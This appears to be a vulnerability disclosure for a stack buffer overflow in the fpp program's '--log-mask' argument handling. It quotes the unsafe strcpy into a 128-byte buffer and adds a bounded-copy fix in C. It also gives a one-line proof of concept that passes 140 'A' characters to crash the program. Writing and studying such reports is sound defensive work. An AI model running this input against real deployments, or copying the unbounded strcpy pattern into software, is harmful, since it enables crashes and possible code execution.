Stack-based Buffer Overflow in FalconChristmas/fpp

Valid
Reported on May 30th 2021

✍️ Description

Hi,

There is a stack-based buffer overflow in https://github.com/FalconChristmas/fpp/blob/f4a1621c8be15a41305269830b700a2b5443aa0f/src/fpp.c#L177 :

    else if((strcmp(argv[1],"--log-mask") == 0) &&  argc > 2)
    {
      char newMask[128];
      strcpy(newMask, argv[2]);//overflow

      /**/
    }

argv[2] is copied into the 128-byte stack buffer newMask using strcpy, a function that performs no size validation when it copies buffers, so any argument of 128 bytes or more overruns the buffer. This behavior leads to a stack-based buffer overflow.
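The same argument dispatch with a length check in front of the copy, as an added example of the fix (this is not fpp's own code); the buffer size mirrors the snippet above and the mask values used are constructed:

```c
#include <stdio.h>
#include <string.h>

#define LOG_MASK_MAX 128   /* same size as newMask[128] in fpp.c */

/* Bounded replacement for strcpy(newMask, argv[2]).
 * Returns 1 and fills newMask on success, 0 if the value does not fit.
 * The check is ">=" because the terminating NUL also needs a byte. */
int copy_log_mask(const char *value, char *newMask, size_t newMaskSize)
{
    size_t len = strlen(value);
    if (len >= newMaskSize) {
        return 0;
    }
    memcpy(newMask, value, len + 1);   /* copies the NUL as well */
    return 1;
}

/* Mirrors the "--log-mask" branch of the argument parser (hypothetical
 * wrapper). Returns 1 if the option was accepted, 0 if rejected or absent. */
int handle_log_mask(int argc, char **argv)
{
    char newMask[LOG_MASK_MAX];

    if (argc > 2 && strcmp(argv[1], "--log-mask") == 0) {
        if (!copy_log_mask(argv[2], newMask, sizeof newMask)) {
            fprintf(stderr, "--log-mask: value too long (max %d bytes)\n",
                    LOG_MASK_MAX - 1);
            return 0;
        }
        /* the mask string would be parsed from newMask here */
        return 1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    return handle_log_mask(argc, argv) ? 0 : 1;
}
```

Passing the 140-byte argument from the proof of concept to this version yields a clean error instead of a corrupted stack frame.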

🕵️‍♂️ Proof of Concept

Run: ./fpp --log-mask $(python -c'print("A"*140)')

💥 Impact

Crash, arbitrary code execution